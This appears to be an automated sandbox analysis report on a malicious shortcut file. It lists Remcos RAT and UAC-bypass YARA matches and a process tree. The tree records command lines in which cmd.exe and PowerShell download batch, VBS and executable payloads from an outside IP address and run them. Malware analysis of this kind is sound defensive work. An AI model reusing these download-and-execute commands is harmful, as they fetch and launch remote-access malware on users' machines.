                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@44/34@0/2
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,16_2_00407776
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_0040118A GetDiskFreeSpaceExW,SendMessageW,16_2_0040118A
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_004034C1
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,16_2_00401BDF
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\hello.batJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1052:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdnnkvff.gsl.ps1Jump to behavior
                      Source: Yara matchFile source: 17.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000011.00000000.2322852163.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2318798588.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\DZIPR.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: Dlr7HYI6VL.lnkReversingLabs: Detection: 15%
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
                      Source: C:\Users\user\DZIPR.exeProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe" Jump to behavior
                      Source: C:\Users\user\DZIPR.exeProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
